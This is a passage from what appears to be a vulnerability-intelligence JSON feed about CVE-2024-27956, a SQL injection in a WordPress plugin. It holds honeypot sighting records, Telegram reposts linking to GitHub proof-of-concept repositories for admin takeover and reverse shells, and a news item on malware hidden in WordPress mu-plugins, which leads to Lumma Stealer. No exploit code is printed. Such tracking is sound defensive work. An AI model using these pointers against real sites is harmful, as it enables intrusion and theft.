"1331d0c2-b15c-474c-bf78-8044acecc981", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-23)", "content": "", "creation_timestamp": "2025-12-23T00:00:00.000000Z"}, {"uuid": "0c091f0f-efc8-45ca-a112-8fa61f832d37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-02-11)", "content": "", "creation_timestamp": "2026-02-11T00:00:00.000000Z"}, {"uuid": "2abdec27-62db-4e1d-8f59-58ebbedb518e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-01)", "content": "", "creation_timestamp": "2026-02-01T00:00:00.000000Z"}, {"uuid": "ea1ce589-09fd-454d-9ef8-3d466ceb19fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-29)", "content": "", "creation_timestamp": "2026-03-29T00:00:00.000000Z"}, {"uuid": "3ebc75ae-e101-476f-b48c-973475c60041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-15)", "content": "", "creation_timestamp": "2026-01-15T00:00:00.000000Z"}, {"uuid": "2c43c923-0c00-4b67-929f-b801517f49db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-18)", "content": "", "creation_timestamp": "2026-01-18T00:00:00.000000Z"}, {"uuid": "98570205-6e48-44c6-8dda-f4d06c0fae7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-25)", "content": "", "creation_timestamp": "2026-03-25T00:00:00.000000Z"}, {"uuid": "a69d45a7-ea87-416d-864d-82caa3d8fe83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-06)", "content": "", "creation_timestamp": "2026-04-06T00:00:00.000000Z"}, {"uuid": "ace047e0-340c-4f5f-a189-3a19b3a982be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7948", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPerform with massive Wordpress SQLI 2 RCE\nURL\uff1ahttps://github.com/ThatNotEasy/CVE-2024-27956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T14:21:47.000000Z"}, {"uuid": "6c63495a-97be-446e-8caa-39e48183ce7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/10434", "content": "SQL Vulnerability in WordPress Automatic Plugin (CVE-2024\u201327956): https://roadtooscp.medium.com/sql-vulnerability-in-wordpress-automatic-plugin-cve-2024-27956-3635f1d32b4e?source=rss------bug_bounty-5", "creation_timestamp": "2024-08-19T06:52:52.000000Z"}, {"uuid": "bbb5730a-3c8b-4eb1-9927-181607337228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-18)", "content": "", "creation_timestamp": "2026-04-18T00:00:00.000000Z"}, {"uuid": "fd7c0814-8f3d-4513-9e1c-3c42a4217f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "Telegram/-VT47eGLn6V5kRZ4cPXpiIgY4bebqpHSpnMi-4aWG0NiegQ2", "content": "", "creation_timestamp": "2025-02-14T21:08:31.000000Z"}, {"uuid": "f75bed8a-ea7d-466f-abbb-4675cff3cf5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7304", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-27804\nURL\uff1ahttps://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-14T14:36:44.000000Z"}, {"uuid": "399f4577-b58a-4b38-ad2c-15a1a7f3b395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7634", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aValve Press - CVE-2024-27956-RCE - SQL Injection\nURL\uff1ahttps://github.com/TadashiJei/Valve-Press-CVE-2024-27956-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-13T02:09:17.000000Z"}, {"uuid": "6194a381-8b79-4839-9a3e-5fb8f9d946c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7240", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-27956\nURL\uff1ahttps://github.com/k3ppf0r/CVE-2024-27956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-07T10:09:15.000000Z"}, {"uuid": "c044c3d0-c2fc-4ada-93d5-a2e4f3d4304a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7206", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPoC for SQL Injection in CVE-2024-27956\nURL\uff1ahttps://github.com/blue0x1/mobilemouse-exploit\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-05-03T12:44:40.000000Z"}, {"uuid": "6bcfcfbf-6719-44fa-936c-084f57112c00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7193", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC for wordpress takeover in CVE-2024-27956\nURL\uff1ahttps://github.com/diego-tella/CVE-2024-27956-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-01T02:02:16.000000Z"}, {"uuid": "358efb30-09d5-4e59-be36-3aec7cb75f60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7209", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-27956 WORDPRESS RCE PLUGIN\nURL\uff1ahttps://github.com/gotr00t0day/CVE-2024-4040\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-03T23:32:23.000000Z"}, {"uuid": "92d28705-5294-49ea-a7cd-d9cad56e6e65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7208", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-27956 WORDPRESS RCE PLUGIN\nURL\uff1ahttps://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-03T16:20:49.000000Z"}, {"uuid": "9a49a8c1-ef1f-490b-b0f1-af0d31684d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7290", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-27956 RCE POC WordPress\nURL\uff1ahttps://github.com/nancyariah4/CVE-2024-27956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-13T11:52:53.000000Z"}, {"uuid": "93b95411-7cc5-49b3-8e3d-0f188bd27c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://t.me/GithubRedTeam/7303", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-27804\nURL\uff1ahttps://github.com/AiGptCode/WordPress-Admin-Account-and-Reverse-Shell-cve-2024-27956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-14T14:31:32.000000Z"}, {"uuid": "b281ca01-b96d-4eb1-b15f-d61b4d48ff7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-27)", "content": "", "creation_timestamp": "2026-04-27T00:00:00.000000Z"}, {"uuid": "5434662e-3c7c-4e57-a9c2-55f228988f5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/pZwcCYQukOtRLWk7NTp5Nlaw1XUizNIAu3QSCOkD3M6Qc1s", "content": "", "creation_timestamp": "2025-10-17T21:00:04.000000Z"}, {"uuid": "a2de7d8f-0847-4d76-a9f9-84757d8e2637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/8q0G2XoGgrXP8O-oMiUuoKtzfH3vGd_RQiplze-y2V_UL3MF", "content": "", "creation_timestamp": "2025-07-13T02:12:02.000000Z"}, {"uuid": "bec6bc21-b143-47fe-9fa5-95dc51d2e060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "Telegram/h9HbZ2k29WBhPqZedI7raK6Z0Uo2xDhBpR3YwH0Zr2iyDfc", "content": "", "creation_timestamp": "2025-07-22T12:59:19.000000Z"}, {"uuid": "a3e55e38-c704-49f4-844c-c0fb63baf47f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/ap_security/550", "content": "#cve #exploit #poc\n\n\ud83d\udc89CVE-2024-27956: WordPress RCE\n\nPoC \u0434\u043b\u044f CVE-2024-27956, SQL Injection \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 ValvePress Automatic. \u0414\u0430\u043d\u043d\u044b\u0439 PoC \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0435\u043c\u0443 \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430. \u0421\u0442\u0430\u0442\u0443\u0441 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0432 Wordpress \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430\n\n\ud83d\udc31GitHub", "creation_timestamp": "2024-05-14T04:26:53.000000Z"}, {"uuid": "b4e2d5fa-823b-498a-87fe-a04840c3ce9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "Telegram/ZmNdkUlwMi8wIyWb9PMqpqbhuxrMGAAlpZqMM06bDWpior15", "content": "", "creation_timestamp": "2025-07-13T02:12:00.000000Z"}, {"uuid": "87d758e2-da9c-48b5-8b29-76c79beab435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "https://t.me/itsec_news/5672", "content": "\u200b\u26a1\ufe0f\u0425\u0430\u043a\u0435\u0440\u044b \u0441\u043a\u0440\u044b\u0432\u0430\u044e\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432 \u043e\u0441\u043e\u0431\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 WordPress\n\n\ud83d\udcac \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Sucuri \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0441\u0445\u0435\u043c\u0443 \u0430\u0442\u0430\u043a , \u043f\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043e\u0441\u043e\u0431\u0443\u044e \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e WordPress \u2014 \u00abmu-plugins\u00bb \u2014 \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430. \u042d\u0442\u0430 \u043f\u0430\u043f\u043a\u0430 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0430 \u0434\u043b\u044f \u0442\u0430\u043a \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u044b\u0445 must-use \u043f\u043b\u0430\u0433\u0438\u043d\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0431\u0435\u0437 \u0443\u0447\u0430\u0441\u0442\u0438\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u043d\u0435 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u044e\u0442\u0441\u044f \u0432 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u043c \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435. \u0422\u0430\u043a\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u0434\u0435\u043b\u0430\u0435\u0442 \u0435\u0451 \u0438\u0434\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u043e\u0439 \u0434\u043b\u044f \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e\u0433\u043e \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u043e\u0432.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0431\u044b\u043b\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u0441\u0440\u0430\u0437\u0443 \u0442\u0440\u0438 \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 PHP-\u0444\u0430\u0439\u043b\u043e\u0432. \u041e\u0434\u0438\u043d \u0438\u0437 \u043d\u0438\u0445, \u00abredirect.php\u00bb, \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u043b \u0441\u043a\u0440\u044b\u0442\u043e\u0435 \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u0434 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430. \u0412\u0442\u043e\u0440\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430, \u00abindex.php\u00bb, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0434\u0433\u0440\u0443\u0437\u043a\u0443 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0441 GitHub. \u0422\u0440\u0435\u0442\u0438\u0439 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u00abcustom-js-loader.php\u00bb, \u0432\u043d\u0435\u0434\u0440\u044f\u043b \u043d\u0435\u0436\u0435\u043b\u0430\u043d\u043d\u044b\u0439 \u0441\u043f\u0430\u043c \u0438 \u0437\u0430\u043c\u0435\u043d\u044f\u043b \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043d\u0430 \u043e\u0442\u043a\u0440\u043e\u0432\u0435\u043d\u043d\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b, \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u0432\u043d\u0435\u0448\u043d\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0441\u0430\u0439\u0442\u044b.\n\n\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043c\u0435\u0442\u043e\u0434\u0430 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0443\u043c\u0435\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0442\u044c, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043b\u0438 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u043b\u044c \u0431\u043e\u0442\u043e\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \u0415\u0441\u043b\u0438 \u044d\u0442\u043e \u0442\u0430\u043a, \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u043d\u0434\u0435\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f. \u042d\u0442\u043e \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u043a \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044e \u0438 \u0434\u0435\u043b\u0430\u0435\u0442 \u0435\u0451 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0434\u043b\u044f \u043e\u0431\u044b\u0447\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0442\u0430\u043a\u043e\u0439 \u043f\u043e\u0434\u0445\u043e\u0434 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0447\u0430\u0441\u0442\u044c\u044e \u0431\u043e\u043b\u0435\u0435 \u0448\u0438\u0440\u043e\u043a\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u043d\u0430 WordPress \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u0438 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0445 \u0430\u0442\u0430\u043a. \u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u044b \u0441\u043b\u0443\u0447\u0430\u0438 , \u043a\u043e\u0433\u0434\u0430 \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u0435\u043b\u044f\u043c \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043f\u0440\u043e\u0439\u0442\u0438 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u0443\u044e \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 reCAPTCHA \u0438\u043b\u0438 Cloudflare CAPTCHA, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u043b\u0438\u0441\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b PowerShell \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u043e\u0439 \u0442\u0440\u043e\u044f\u043d\u0430 Lumma Stealer.\n\n\u041f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c\u043d\u043e \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u0430\u0439\u0442\u0430\u0445 \u043c\u043e\u0436\u0435\u0442 \u0440\u0430\u0437\u043c\u0435\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 JavaScript, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0439 \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u043f\u043b\u0430\u0442\u0451\u0436\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u043e\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u043d\u0430 